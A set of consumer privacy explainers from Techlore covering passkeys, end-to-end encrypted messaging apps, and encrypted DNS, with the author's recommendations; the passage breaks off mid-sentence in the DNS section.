Passwords? URL: https://techlore.tech/what-are-passkeys-and-how-do-they-replace-passwords/ Last updated: 2026-07-19T01:36:09.000Z ## 📖 The Basics ### What It Is A passkey is a cryptographic credential that can replace your password. Instead of a string of characters you type in, a passkey is a pair of mathematically linked keys: a public key stored on the website's server, and a private key that lives securely on your device. When you log in, the server verifies the signature of your private key with the public key, and then you're done! All without sending a password, without sending a code, without anything that could be stolen in transit. The consumer-facing name "passkey" was adopted by Apple, Google, and Microsoft to describe this technology for everyday users. But the underlying standards are [**FIDO2 and WebAuthn**](https://fidoalliance.org/fido2/), which remain the foundation. While passkeys are still new, they are quickly expanding and commonly touted as the future of account security. ### How It Works #### Registration When you set up a passkey for an account, your device generates a unique key pair for that specific site. The public key is sent to and stored by the service. The private key is stored in your device's secure hardware or software. To unlock and use that private key, you authenticate locally with your biometrics (Face ID, fingerprint) or device PIN. Critically: your biometrics are not sent to a server. They never leave your device. They're used only to unlock the private key that's already there. As of mid-2026, you have several options for services to create passkeys for you, from operating systems, to password managers, to browsers. We'll discuss these options shortly. #### Logging In When you return to log in, your device uses the private key to create a cryptographic signature and sends it back. The server verifies it against the public key it stored. Done. There is no password to guess, no code to intercept, and no shared secret that could be stolen from either side. This makes passkeys inherently phishing-resistant. #### How This Eliminates Phishing The signature your device creates is mathematically bound to the exact origin of the site you're authenticating with. A convincing fake site at `paypa1.com` cannot receive and use a signature meant for `paypal.com`. This is what "phishing-resistant" means day-to-day, and it's what separates passkeys from standard passwords. #### Where Passkeys Live, How To Get Started Your passkey's private key needs to live somewhere accessible across your devices. The current main options in 2026: - *Platform managers*: [iCloud Keychain](https://support.apple.com/en-us/HT204085) (Apple), [Google Password Manager](https://passwords.google.com/), [Windows Hello](https://www.microsoft.com/en-us/windows/tips/windows-hello), and other platforms sync passkeys automatically within their ecosystems/operating systems. This is great if you live in one ecosystem, but it's less convenient if you use a mix of devices, since cross-platform portability has historically been limited. - *Browsers*: [Chrome](https://support.google.com/chrome/answer/13175197), [Brave](https://brave.com/glossary/passkey/#do-i-need-special-software-to-use-passkeys) and [Firefox](https://support.mozilla.org/en-US/kb/passkeys-on-firefox) can store passkeys directly. Safari on Apple devices defers to iCloud Keychain rather than managing passkeys itself. Browser-stored passkeys are convenient if you primarily use one browser across your devices, but tie you to that browser's ecosystem in a similar way to platform managers. - *Password managers*: [Bitwarden](https://bitwarden.com/), [1Password](https://1password.com/), [Proton Pass](https://proton.me/pass), and most major managers now support storing and autofilling passkeys alongside your passwords. This gives you cross-platform access and keeps everything in one vault, regardless of which OS or browser you're on. Instead of your password manager autofilling a password in your browser, it will auto-suggest a passkey. No matter which you choose, I suggest picking one place, being consistent, and to avoid mixing unless you have a reason to. The user experience of passkeys in 2026 is still maturing and it's not uncommon to get multiple prompts from your browser, OS, and password manager extension in sequence before authenticating. So stick with one option to avoid confusion. #### Where Passkeys Don't Exist Yet Adoption is substantial but still uneven. Major platforms like Google, Microsoft, Amazon, Apple, and PayPal have deployed passkeys, with [Microsoft making passkeys the default for new accounts](https://www.microsoft.com/en-us/security/blog/2025/05/01/pushing-passkeys-forward-microsofts-latest-updates-for-simpler-safer-sign-ins/). But plenty of services still don't support them, so passwords aren't going away yet. Your password manager remains essential as the fallback for everything that hasn't made the transition. #### Sharing Passkeys This is a genuine limitation worth knowing about. Passwords are easy to share, you just copy a string and send it. Passkeys are identity-bound by design, which is most of what makes them secure, but it also means sharing isn't built in the same way. Support varies significantly by where your passkey lives: - *Apple iCloud Keychain*: a solid sharing story right now. You can AirDrop a passkey directly to a nearby contact, or use Shared Groups to share passkeys with family or trusted contacts, with changes syncing across the group automatically. - *1Password*: supports passkey sharing via shared vaults, available on Families and Business plans. - *Most other managers*: limited or not yet supported. Bitwarden has sharing on its roadmap but hasn't shipped it broadly. The practical workaround for services that support both: most sites that offer passkeys still keep a password as a fallback. #### What If I Lose My Device? This can prevent people from adopting passkeys. The answer depends on where the passkey lives: - *In iCloud Keychain, Google Password Manager, or another platform manager*: your passkeys are synced to the cloud, encrypted with your account credentials. Sign into your account on a new device and they come back. Losing one device doesn't lose the passkey. - *In a cross-platform password manager* (Proton Pass, Bitwarden, 1Password): same idea. The passkey is stored in your vault, which syncs to whichever device you log in on next. Losing one device is recoverable. - *On a hardware security key with no backup*: this is the one case where loss can mean account loss. Always register a second passkey or security key, store a backup recovery code somewhere safe, and never rely on a single physical device for an account you'd hate to lose. Most services that support passkeys also keep an account recovery path (email, backup codes, an alternative second factor). Keep recovery codes printed somewhere you can find them, and test your recovery process before you actually need it. #### Passkeys vs. Hardware Security Keys: An Honest Comparison Hardware security keys (like [YubiKeys](https://www.yubico.com/)) and passkeys are related but distinct...and confusingly can also work together. A passkey *typically* lives in software: your device, a browser, or a password manager. A hardware security key is a physical device, and it can play two different roles depending on how it's used: - **As a second factor alongside a password**: you enter your password, then tap the key to access your account. This is the more common use-case covered in depth in the Two-Factor Authentication article. - **As a passkey device itself**: modern security keys can store passkeys directly on the hardware. In this case, the key acts as the passkey. Plug it in, tap it, done. No password, no biometric prompt on your device. This is the highest-security passkey setup available, since the private key never touches your phone or computer at all. For most people, a software passkey stored in a password manager is a major security upgrade. For higher-risk users, storing passkeys on a dedicated hardware key kept separate from your main devices adds a layer that software passkeys don't provide. Just don't forget to find a way to establish backups in the event you lose your key. Some accounts support both passkeys and a traditional password with a hardware security key as a second factor. If you're choosing between the two, the password-plus-hardware-key combination is arguably the more secure setup since it requires two separate things to be compromised (your password *and* your physical key), whereas a passkey is a single factor, even though it's phishing-resistant. Passkeys win on convenience; password plus a hardware security key wins on the security ceiling. --- ## 🎯 Why It Matters In August 2022, [Twilio and Cloudflare were hit by the same phishing attack](https://blog.cloudflare.com/2022-07-sms-phishing-attacks/) on the same day. Employees received text messages directing them to fake login portals. Twilio employees entered their credentials and their TOTP codes into the fake site. Attackers relayed those in real time to the actual Twilio systems. The breach hit Twilio and over 125 of its downstream customers. Cloudflare employees were using FIDO2 hardware security keys, the same standard that powers passkeys. When the phishing site attempted to relay authentication, the cryptographic binding to the legitimate domain blocked it. The phishing site's domain didn't match. Cloudflare was not breached. Same attack, same day, same attackers. One company compromised, one not. This is why passkeys are so powerful! Passwords and TOTP codes are shared secrets, and because they're shared, they can be stolen, guessed, or intercepted in transit. Passkeys close this attack surface structurally, not just by making the secret harder to guess. For everyday users, passkeys are both more secure than passwords and easier to use. No password to create, no code to type, no text to wait for. The security upgrade comes with a usability upgrade, which is a rare combo. Passkeys probably won't fully replace passwords in the near term, but adoption is accelerating. Understanding what they actually are now means you can evaluate the tradeoffs clearly as they spread, rather than taking whatever default your browser or OS decides to push you toward. --- ## 💡 Common Misconceptions ### "Passkeys and security keys are the same thing." This is the single most common point of confusion in this category. A *passkey* replaces your password, it becomes the credential itself. A *security key* (like a YubiKey) is *typically* a second factor on top of a password. The reason these get mixed up is that a hardware security key can also be used to store a passkey on some services. ### "Passkeys mean my fingerprint or face is sent to the server." No. Biometrics are typically used locally on your device to unlock the private key that's already there. Your fingerprint or face never leaves the device. The server only ever sees a public key and a cryptographic signature. ### "Passkeys are going to replace passwords for me right now." Probably not yet. Plenty of services still don't support passkeys at all, so passwords aren't going anywhere immediately. Treat passkeys as additive, adopt them where they exist, keep a password manager for everything else. ### "Passkeys lock me into Apple, Google, or Microsoft." That was a real concern early on. As of 2026, every major password manager like Proton Pass, Bitwarden, 1Password, and KeePassXC stores passkeys natively and syncs them across platforms, some even allowing import/export. You don't have to live in one ecosystem to use passkeys. The cross-platform path exists and works. --- ## 🗣️ Henry's Take If you're already using a password manager that generates 24-character random strings for every account, the upgrade from password-plus-TOTP to a passkey is still justifiable: they're phishing-resistant by design, no shared secret on the server, nothing to relay. The next time a service you use offers passkeys, take them up on it and see if you like the user experience. My personal stack, top to bottom: 1. **Password + hardware security key**: for accounts that support it. Two separate factors, highest ceiling. I use [Proton Pass](https://proton.me/pass) for password management and YubiKeys for my 2FA. 2. **Passkey in my password manager**: the everyday default for everything else that supports it. I keep mine in [Proton Pass](https://proton.me/pass). I've been actively migrating accounts off TOTP and onto passkeys where the option exists since the security is broadly comparable, but the convenience is meaningfully better, and the phishing resistance is real. 3. **Password + OTP**: for everything that hasn't gotten passkey support yet. Pick one place for your passkeys and stay there. Getting prompts from your browser, OS, *and* password manager extension all at once is the fastest way to give up on the whole thing. --- ## ✅ Henry's Picks Where to store your passkeys depends mostly on how mixed your device ecosystem is. - **In your password manager, recommended for most people.** [Proton Pass](https://proton.me/pass), [Bitwarden](https://bitwarden.com), [1Password](https://1password.com), and [KeePassXC](https://keepassxc.org) all support storing and autofilling passkeys. Cross-platform, no ecosystem lock-in, and credentials stay in one vault. - **In a platform manager.** [iCloud Keychain](https://support.apple.com/HT204085) for Apple, [Google Password Manager](https://passwords.google.com) for Android/Chrome, or [Windows Hello](https://www.microsoft.com/en-us/windows/tips/windows-hello). The right pick if you live almost entirely inside one ecosystem and value the deepest possible integration. - **On a hardware key.** A [YubiKey](https://www.yubico.com) or [Nitrokey](https://www.nitrokey.com) can store passkeys directly. The highest security ceiling available, with the real cost that you have to carry the key (and ideally a backup). To check whether a specific service supports passkeys before you set up an account, [passkeys.io](https://www.passkeys.io/who-supports-passkeys) maintains a directory. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Encrypted Messaging: Which Apps Are Actually Private? URL: https://techlore.tech/encrypted-messaging-which-apps-are-actually-private/ Last updated: 2026-07-19T01:34:53.000Z ## 📖 The Basics ### What It Is Encrypted messaging means your messages are scrambled before leaving your device and can only be unscrambled by your recipient's device. The company running the platform never has access to a readable version of your conversation, which means they can't hand it over, sell it, or expose it in a breach. ### How It Works #### What End-To-End Encryption Actually Does When you send a message on an E2EE platform, your app encrypts it using your recipient's public key before it leaves your device. The encrypted message travels through the company's servers, but they see only ciphertext they cannot read. When it arrives, your recipient's device decrypts it using their private key. The company at no point has access to the plaintext. This isn't a policy choice that can be reversed under legal pressure, it's a structural property of the architecture. A platform that genuinely implements E2EE cannot produce your message contents to law enforcement even if ordered to, because it doesn't have them. #### What E2EE Doesn't Protect End-to-end encryption protects message content. It does not automatically protect metadata, and metadata can be as revealing as content. Even with E2EE enabled, the company may retain records of who you communicate with, when, how often, and for how long. This is why the Metadata article matters to read alongside this one, since the two threats require separate protections. #### Forward Secrecy and Why It Matters The strongest E2EE implementations include **forward secrecy** (also called perfect forward secrecy): the encryption keys used for each session are temporary and discarded after use. Even if an attacker later compromises your device or the platform's systems and obtains past encrypted messages, they cannot decrypt historical conversations because the keys that encrypted them no longer exist. Without forward secrecy, a stolen encryption key unlocks everything ever encrypted with it. With it, the blast radius of any future compromise is limited to the current session. #### The Popular Platforms and The Security They Provide - [*Signal*](https://signal.org): E2EE by default for all messages, voice calls, and video calls, using the Signal Protocol, which is the most widely audited and respected E2EE messaging implementation available. What Signal can produce to law enforcement under compulsion: typically only the date an account was created and the date it last connected to Signal's servers. Signal requires a phone number to register, but you can create a username and configure your account so contacts reach you via username rather than phone number, keeping your number off of other people's devices. For most people, this resolves the identity-linkage concern adequately. - [*WhatsApp*](https://www.whatsapp.com): E2EE by default for messages and calls, also using the Signal Protocol for the encryption layer itself. The content of your messages is protected. But WhatsApp is owned by Meta, and the metadata WhatsApp collects, like who you talk to, how often, when, your contacts list, and your device identifiers, feeds into Meta's broader data infrastructure. This is the meaningful distinction between WhatsApp and Signal: the encryption is similar, the surrounding data collection is not. - [*Telegram*](https://telegram.org): not E2EE by default. Regular Telegram chats use client-server encryption, meaning Telegram's servers hold readable copies of your messages for multi-device sync. Telegram can read these, and can produce them if compelled. Secret Chats are a separate feature that must be manually activated for every one-on-one conversation. While these do use E2EE with forward secrecy, Secret Chats are not available in group conversations and are not available on all platforms. Most importantly, they are not the default experience. Most people using Telegram assume they have more privacy than they do. - [*Facebook Messenger*](https://www.messenger.com): [rolled out E2EE by default for personal chats in late 2023](https://about.fb.com/news/2023/12/default-end-to-end-encryption-on-messenger/), after years of offering it only as an opt-in Secret Conversations mode. Similar to WhatsApp, Messenger is a Meta product with the same metadata exposure. - *SMS and standard phone calls*: not encrypted at any level that provides meaningful protection. Carriers retain message and call records. SMS messages are accessible to anyone positioned in the carrier infrastructure. SMS is not a private communication channel. - *RCS (Google Messages / iPhone)*: RCS is the modern replacement for SMS, and [as of May 2026, E2EE for cross-platform RCS conversations between Android (Google Messages) and iPhone is rolling out in beta](https://blog.google/products-and-platforms/platforms/android/android-ios-end-to-end-encrypted-rcs-messaging/). When the lock icon is visible, message content is protected in transit. The caveats: it's still in beta and requires iOS 26.5 and a supported carrier on the iPhone side; carrier infrastructure is still involved in the exchange in ways it isn't with Signal; and metadata remains accessible to carriers and the platform. RCS with E2EE is better than plain SMS, but it is not a Signal replacement. Think of it as a floor being raised, not a ceiling being reached. And not *all* RCS is E2EE, you have to double-check you are using E2EE. #### Verifying Who You're Actually Talking To Even with perfect encryption, there's a remaining attack: a compromised server or sophisticated adversary could substitute their own keys into the exchange, quietly reading messages intended for someone else. Key verification is how you close that gap, it lets you confirm out-of-band that the keys your app received actually belong to your contact and not to an attacker sitting in the middle. **Signal** calls these Safety Numbers. Both people open the conversation settings and compare a unique fingerprint...ideally in person, over a video call, or through another trusted channel. If the codes match, the key exchange was clean. If they don't, something is wrong. Once verified, Signal will alert you if the safety numbers change unexpectedly, which is a reason to pause before continuing sensitive conversations. Read our full guide on verifying Signal Safety Numbers. **iMessage** introduced the same concept as [Contact Key Verification](https://support.apple.com/en-us/118246). You can compare codes live or share a Public Verification Code that others store in your contact card. iMessage alerts you automatically if verification fails or an unrecognized device appears on someone's account. Most threat models don't require this. But for journalists, lawyers, activists, public figures, or anyone communicating with sources where an adversary with real resources is a realistic threat, verifying safety numbers with your most sensitive contacts takes about thirty seconds and meaningfully raises the bar for any attack. #### For Anonymity-Focused Requirements When even a hidden phone number as an account identifier is too much exposure, a few options go further: - [*Session*](https://getsession.org): no phone number, no email address, no personal information required. Registration generates an Account ID and seed phrase. Messages are E2EE and routed through a decentralized network of community-operated nodes using onion routing, so there's no central server to compel. The tradeoff is a lack of forward secrecy, as well as a smaller user base and a usability experience that doesn't match Signal's. - [*SimpleX*](https://simplex.chat): no user identifiers of any kind on the platform's servers. You connect by exchanging one-time invitation links. There are no accounts to correlate to an identity. Suited for the highest-sensitivity situations; user base is smaller and the experience is more technically demanding. - [*Briar*](https://briarproject.org): no central server at all. Messages sync directly between devices P2P, routed over Tor by default when internet is available, or over local Wi-Fi and Bluetooth when it isn't. This makes Briar usable in environments where internet access is restricted or monitored, and means there's no infrastructure to compel or take down. The tradeoff is that both parties need to be online at the same time for messages to deliver, and the user base is very small. Best suited for high-risk situations where network-level surveillance or infrastructure disruption is a realistic threat. --- ## 🎯 Why It Matters In 2013, it came to light that the Justice Department, hunting for the source of a leaked classified report, had obtained a Fox News journalist's personal emails to figure out who he had been talking to inside the State Department. Law enforcement, working with the email provider, requested the stored messages rather than intercepting anything in transit. The source, State Department adviser [Stephen Kim](https://en.wikipedia.org/wiki/Stephen%5FJin-Woo%5FKim), was identified, prosecuted, and sentenced to 13 months in prison. The content of those messages wasn't intercepted, it was just requested from the provider who had stored it in readable form the whole time. That's the core of this issue: **when a platform can read your messages, so can anyone with the legal authority to make them produce it, or a third-party contractor, or a hacker.** On platforms with E2EE, you don't have to trust a platform and the downstream parties. It's also worth knowing that governments periodically push to change this. Law enforcement and intelligence agencies have argued for years that encrypted messaging apps create a "going dark" problem, where criminals and terrorists use them to evade lawful surveillance. The proposed solution is always some version of a backdoor: exceptional access that only the right people can use. The technical community's answer has been consistent for decades: [there is no such thing](https://www.eff.org/files/2025/08/19/the%5Fcrypto%5Fwars.pdf). A backdoor that works for governments works for every other adversary too. You cannot build a weakness into encryption that only opens for the right key. When you use Signal or any other genuinely E2EE messenger, you're benefiting directly from the fact that this argument has so far prevailed. Stay vigilant. --- ## 💡 Common Misconceptions ### "If a platform calls itself encrypted, it is." Telegram is the cleanest counter-example. Its default chats are not end-to-end encrypted. Secret Chats are E2EE, but they have to be manually activated, don't work in group conversations, and aren't on every platform. It's always worth asking what being 'encrypted' actually means to a platform. ### "WhatsApp and Signal are essentially the same, both use the Signal Protocol." The encryption layer is broadly similar. The metadata layer isn't. WhatsApp is owned by Meta, and the surrounding data like who you message, how often, your contacts list, device identifiers and more all flow into Meta's broader data infrastructure. Signal is architected to retain almost none of that. ### "The goal is finding the most private messenger possible." Privacy is a social system, not an individual choice. A messenger that's flawless on paper but nobody in your life will use is doing none of the work it's supposed to do. The realistic goal is to land at the most private place you can while still bringing your network with you. Signal hits that sweet spot for a lot of people. ### "SMS is fine for personal stuff." SMS isn't encrypted at any level that provides meaningful protection. Carriers retain message and call records for long periods, and that history is routinely produced under legal request. RCS with end-to-end encryption is starting to roll out cross-platform and meaningfully raises the floor...but it's a floor, not a replacement for a proper app like Signal. ### "If Signal were really private, the people who run other apps wouldn't keep claiming otherwise." Public figures who run competing messaging products have a recurring habit of spreading misleading claims about end-to-end encrypted apps like Signal...usually right around the time they're promoting their own platform as an alternative. The claims tend not to survive contact with [Signal's published cryptographic protocol](https://signal.org/docs/), the [history of independent audits](https://community.signalusers.org/t/wiki-overview-of-third-party-security-audits/13243), or its [public transparency reports](https://signal.org/bigbrother/), which show that the only thing Signal can produce under subpoena is account-creation and last-connection timestamps. When you're evaluating a claim that an E2EE messenger is broken, ask what evidence is being cited and whether the person making the claim sells a competing product. --- ## 🗣️ Henry's Take The single line I'd put at the top of this entire section if I could: **privacy is a social system, not an individual choice.** The most private, secure, anonymous messenger in the world does nothing if no one in your life will use it. Unless your threat model requires it, I think the goal should be to find the most private place you can land while still bringing your network with you. That's the sweet spot. For most people, Signal hits it. It's free, the experience is competitive with mainstream apps, and the cryptography behind the marketing has been independently audited many times over. There are certainly more private and anonymous messengers than Signal, but they tend to be much harder to convince friends & family to adopt. My personal stack is small. Signal for everything, with a few specific people reachable via iMessage when they don't use Signal. One iMessage trick: iMessage lets you add an email address as an identifier on your Apple ID, and anyone who messages that email gets the same end-to-end encryption as if they'd texted your number. You can pair that with a custom domain to give out a dedicated email-as-iMessage handle that's never your real phone number. I love this as it lets me keep E2EE with people who I don't want to share a phone number with, without asking them to install anything new. For the rare cases I have to send actual SMS, a VoIP service handles it so my real number never touches the message. (I don't use my SIM's phone number for anything!) The last thing worth mentioning, because it gets sloppy in public discourse: a recurring pattern in this space is high-profile figures (billionaires...) who run competing messaging products spreading misleading claims that Signal is compromised, that it works with intelligence services, that its encryption isn't real. These claims almost without fail come from people with their own messenger to promote, and their product is typically objectively worse. The protocol is public, the implementation is open source, the audits are documented, and Signal's response to every subpoena it has ever received is on the record. I like to trust the verifiable thing, not the snake oil salesmen. --- ## ✅ Henry's Picks These are the messengers I actually use and trust. **For most people:** - [**Signal**](https://signal.org): End-to-end encrypted by default for messages, voice, and video. The Signal Protocol underneath has been audited repeatedly and is widely respected enough that it's used inside other apps (including WhatsApp and Facebook Messenger). Signal can hide your phone number behind a username, which addresses the phone-number-as-identifier concern for most threat models. My daily driver. - [**iMessage**](https://support.apple.com/guide/iphone/about-imessage-iph4e9799206/ios): A reasonable secondary when the people you talk to are deep in Apple's ecosystem. End-to-end encrypted between Apple devices, with cross-platform RCS E2EE rolling out in 2026\. Pair it with Apple Advanced Data Protection so iCloud backups of your messages are also E2EE. **For higher privacy or anonymity needs:** - [**SimpleX**](https://simplex.chat): No user identifiers on the platform's servers. Connect by exchanging one-time invitation links. Right for the high end of the threat-model spectrum. - [**Session**](https://getsession.org): No phone number, no email, no central server. Onion-routed through community-operated nodes. Trade-off: no forward secrecy, smaller user base. - [**Briar**](https://briarproject.org): Peer-to-peer with no central server at all. Routes over Tor when there's internet, and over local Wi-Fi/Bluetooth when there isn't. Designed for restricted-network and high-risk environments. **Avoid for private conversations:** - **Telegram**, unless you're using Secret Chats explicitly and you understand what they do and don't cover. - **SMS**, where any alternative exists. Cross-platform RCS with end-to-end encryption is a real improvement over plain SMS, but it's not a Signal replacement. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Encrypted DNS: Why Your DNS Provider Matters for Privacy URL: https://techlore.tech/encrypted-dns-why-your-dns-provider-matters-for-privacy/ Last updated: 2026-07-19T01:33:32.000Z ## 📖 The Basics ### What It Is DNS, the *Domain Name System*, is the internet's phone book. Every time you visit a website, your device needs to look up the IP address behind the domain name you typed. You enter `wikipedia.org` and a DNS resolver translates that into a numerical address your device can actually route to. This lookup happens for nearly every website and every app your device connects to. By default, those lookups travel unencrypted to a DNS resolver operated by your internet service provider. Your ISP sees a complete list of every domain you query—that's a detailed behavioral record of your life online, sitting in plain text on infrastructure you don't control. ### How It Works #### Why plain DNS is a privacy problem When your device asks for a domain name resolution, that query typically includes the full domain in readable plaintext: `your-health-concern.com`, `addiction-support-forum.org`, `competitor-product.com`. Anyone positioned between your device and the resolver can read it. In the United States, ISPs can legally use DNS query data for advertising purposes and share it with government agencies under current law. ISPs have been documented [selling browsing data derived from DNS queries](https://www.consumerreports.org/consumerist/house-votes-to-allow-internet-service-providers-to-sell-share-your-personal-information/). Outside the US, the legal framework varies, but no matter what, unencrypted DNS is readable by your ISP regardless of local law. #### The Main Encrypted DNS Protocols - *DNS over HTTPS (DoH)* wraps DNS queries inside regular HTTPS traffic on port 443, the same port used for all normal web browsing. This makes DNS queries visually indistinguishable from any other HTTPS connection to your ISP. DoH is natively supported in Firefox, Chrome, Brave, and most modern browsers with a simple settings change. - *DNS over TLS (DoT)* encrypts DNS using TLS on a dedicated port (853). It provides the same privacy protection against passive eavesdropping as DoH, but because it uses a distinct port, it's easier for network administrators or ISPs to identify and block. - *DNS over QUIC (DoQ)* is the newer protocol on the block, running DNS over QUIC (the same modern transport HTTP/3 uses). It offers lower latency than DoT and similar censorship resistance properties to DoH. Support is growing in clients and resolvers but isn't yet as universal as DoH. The practical recommendation: DoH for most users due to its censorship resistance and wide browser support. DoT on system-level configurations where DoH isn't available. DoQ where your client and resolver both support it. Any of the three is a meaningful improvement over unencrypted DNS. #### What Encrypted DNS Doesn't Protect Encrypted DNS hides your domain queries from your ISP and local network observers. It does not encrypt all your traffic, a VPN does that. Your ISP can still see the IP addresses your device connects to, which are often correlated with domains even without the DNS query. To put it simply: encrypted DNS meaningfully reduces what your ISP can observe about your browsing, but it's one layer, not a complete solution. For full traffic privacy, it pairs with other tools like a VPN. #### SNI, ECH, and the Remaining Gaps Even with encrypted DNS and HTTPS in place, there was historically one piece of every connection still visible in plaintext to your ISP and any network observer: **Server Name Indication (SNI)**. SNI is a field in the TLS handshake that tells the server which domain the client is trying to reach, which is necessary since many sites share the same IP address. That handshake happened in the open, even if everything after it was encrypted. Your ISP couldn't read your messages, but they could see you were connecting to `mental-health-forum.org` at 2am. **Encrypted Client Hello (ECH)** is the fix. ECH encrypts the entire initial TLS handshake, including SNI. ECH is directly dependent on encrypted DNS to work: the client fetches the ECH configuration via a DNS query, so if that query isn't encrypted, the domain leaks at that step instead. DoH is effectively a prerequisite for ECH to deliver its full benefit. **QUIC** (the transport protocol under HTTP/3) works the same way; ECH extends naturally to QUIC connections, which matters because a growing share of web traffic now runs over HTTP/3. In regards to browser support in 2026: Chrome and Firefox both have ECH enabled by default where servers support it. Safari has announced support but hasn't shipped it broadly yet. Server-side adoption is accelerating; Cloudflare enabled ECH across its network, which immediately covered a significant share of the web. For supported sites in Chrome or Firefox, the SNI gap is getting closed with nothing extra to configure. The practical takeaway: **DoH + ECH together** provide substantially more complete protection at the connection layer than either does alone. If you're using DoH in a modern browser, ECH is likely already working silently in the background. #### How DNS Shifts Trust Switching to an encrypted DNS resolver doesn't eliminate the trust requirement, it just moves it. So your ISP may no longer see your queries, but your DNS provider does instead. Some common services people in our community use: - [*Quad9*](https://quad9.net) *(9.9.9.9)*: operated by a Swiss non-profit under Swiss data protection law. No IP address logging. Built-in blocking of known malicious domains. Strong default for users who want privacy with passive malware protection at no cost. - [*Cloudflare 1.1.1.1*](https://one.one.one.one): Cloudflare's public resolver, independently audited with confirmed no-selling of query data, no ad targeting, and source IP anonymization within 24 hours. A small amount of aggregated, non-personally identifiable data is retained. - [*NextDNS*](https://nextdns.io): the most configurable option with custom blocklists, granular filtering by category, optional query logging for your own visibility and troubleshooting, with logs under your control. Free tier covers 300,000 queries per month; paid plan (\~$20/year) is unlimited. Best for users who want active customizable control on top of private DNS. - [*Mullvad DNS*](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls): available to anyone, not just Mullvad VPN subscribers. RAM-only servers (nothing persists after reboot), no query logs, with optional content-blocking variants for ads, trackers, or malware. Strong option for users who want zero logging without a customization layer. Mullvad offers different lists that include social media, NSFW content, malware, etc. #### Where To Configure DNS Actually configuring DNS results in a lot of confusion for users. The main locations you can set your DNS are: - *Browser level*: Firefox, Chrome, Brave, and most modern browsers have DoH settings in their privacy or network configuration. This is the easiest starting point, it protects queries through that browser but not other apps. - *System level*: configured in OS network settings, dedicated clients, or third-party tools. This protects all DNS queries from that device regardless of browser. Coverage is broader; configuration varies by OS. - *VPN level*: when a VPN is active, it typically routes your DNS through its own resolver by default, which is part of the privacy model and prevents DNS leaks outside the tunnel. Most VPN clients let you override this with a custom DNS provider if you have a reason to (a filtering service like NextDNS, for example). But using a non-VPN DNS provider while on a VPN means your DNS queries go to a different party than your traffic, which could theoretically make you slightly more distinguishable to websites. In practice, this can be an acceptable tradeoff since the privacy benefits of a filtering DNS can outweigh the marginal fingerprinting concern. If anonymity is the goal, Tor is the right tool regardless. That said, the VPN's native DNS is always the first option to try; only change it if you have a specific reason. - *Router level*: configured on your home router, protects every device on the network without individual configuration. Highest coverage, more complex to set up. #### DNS as a System-Wide Filter Several DNS providers (NextDNS, Mullvad's blocking variants, etc.) support blocklists that refuse to resolve known tracker, ad network, and analytics domains. This is especially valuable on mobile and IoT devices. On a desktop browser, extensions like uBlock Origin can block trackers and ads at the page level. But inside a mobile app or a closed operating system, there's no equivalent mechanism. You can't install an extension into your banking app or your news reader. But those apps still make DNS queries every time they phone home to analytics services, ad SDKs, and crash reporters. Setting a filtering DNS provider at the system level on these more limited devices can offer a lot of control. It's one of the few tools available for reducing in-app and IoT tracking without technical workarounds. The trade-off is occasional breakage: aggressive blocklists sometimes catch domains that apps depend on for legitimate functionality. Services like NextDNS let you review blocked queries and whitelist specific domains, which makes it easy to tune. Starting with a well-maintained default list and adjusting from there is a common approach. --- ## 🎯 Why It Matters DNS queries are the metadata of your browsing. And metadata, as the Metadata article covers in depth, can be as revealing as content. A complete timestamped log of every domain your device queried over a month reconstructs a detailed portrait of your interests, health concerns, political attention, relationships, and habits. In the US, ISPs can use this data commercially without explicit user consent. This isn't theoretical, as ISPs have sold aggregated browsing data, and DNS query logs are a core data asset in that market. Encrypted DNS is one of the lowest-effort, highest-impact privacy improvements available. Changing your DNS resolver takes a few minutes in your browser settings. The day-to-day experience of browsing is nearly unchanged. What changes is that your ISP's resolver is no longer the default recipient of everything your device looks up. But there are limits! Encrypted DNS isn't a VPN. Your ISP still sees the IP addresses your device connects to, which are often correlated with the domains you queried. It doesn't encrypt your traffic, prevent fingerprinting, or hide the content of your browsing from the sites you visit. What it does, specifically, is remove the unencrypted DNS query record from your ISP's visibility. And it can provide helpful filtering to offer privacy in other contexts. For most people, switching to Quad9 or Mullvad DNS at the browser or system level is a five-minute change with no downside and a meaningful privacy improvement. --- ## 💡 Common Misconceptions ### "DNS is too technical to bother with." The actual change is a single setting in your browser, OS, or router. After you flip it, the day-to-day experience of browsing is identical, the only difference is that your ISP's logging pipeline is no longer the first thing every website connection touches. ### "Switching DNS will break things." The risk is real but small, and almost always recoverable. The more common scenario is that nothing visible changes at all. The exceptions tend to be specific apps that hardcode a particular resolver, or aggressive filtering blocklists that catch a domain your bank or workplace VPN actually needs. Both are fixable; neither is a reason not to start. You have a lot of control over which DNS tool you choose to use, and many are at low risk for false positives. ### "All encrypted DNS providers are doing the same thing." A privacy-respecting DNS provider (like [Quad9](https://quad9.net) or [Mullvad DNS](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls)) replaces your ISP's logging with no logging. A filtering DNS provider (like [NextDNS](https://nextdns.io) or Mullvad's blocking variants) also refuses to resolve known tracker, ad, and malware domains across every app on your device, which is a second role on top of the first, and it's optional. The choice between providers is downstream of what role you want your DNS to have. ### "Encrypted DNS hides your browsing from your ISP." Partially. Your ISP can no longer read your DNS queries in plaintext. But it can still see the IP addresses your device connects to, and those addresses often correlate to specific sites without the DNS layer needing to be readable. Encrypted DNS is one layer of protection, not full traffic privacy. For full traffic privacy, you need a VPN or Tor. ### "Switching DNS will slow down my browsing." DNS lookup speed depends primarily on how close a resolver is to you and how well its infrastructure is provisioned, not on whether it's encrypted. The major public resolvers (Cloudflare, Quad9, Mullvad) have global infrastructure specifically optimized for low latency. In practice, many people see no change in perceived speed, and some see an improvement over a sluggish ISP resolver. DNS over QUIC (DoQ) is specifically designed to reduce lookup latency. If speed is genuinely a concern, tools like [dnsperftest](https://github.com/cleanbrowsing/dnsperftest) can compare resolver latency from your actual location and help you pick the fastest option that also meets your privacy requirements. --- ## 🗣️ Henry's Take The clearest way I've found to think about encrypted DNS is that it plays two distinct roles, and most of the confusion in this space comes from collapsing them into one. **Role one, everyone should fill this.** Stop sending your queries to your ISP. Pick a non-harvesting resolver and configure it at the system or browser level. Quad9, Mullvad DNS, and Cloudflare 1.1.1.1 all do this without charging you anything. The day-to-day experience doesn't change. The change is that your ISP's logging pipeline stops getting fed. **Role two, some people should fill this.** Use a filtering DNS provider to block tracker, ad, and analytics domains across your devices. This is the only practical way to reduce in-app tracking on a phone or your IoT devices, because you cannot install an extension into your banking app or your Roku. NextDNS and Mullvad's blocking variants both handle this well, with NextDNS being more configurable and gives you 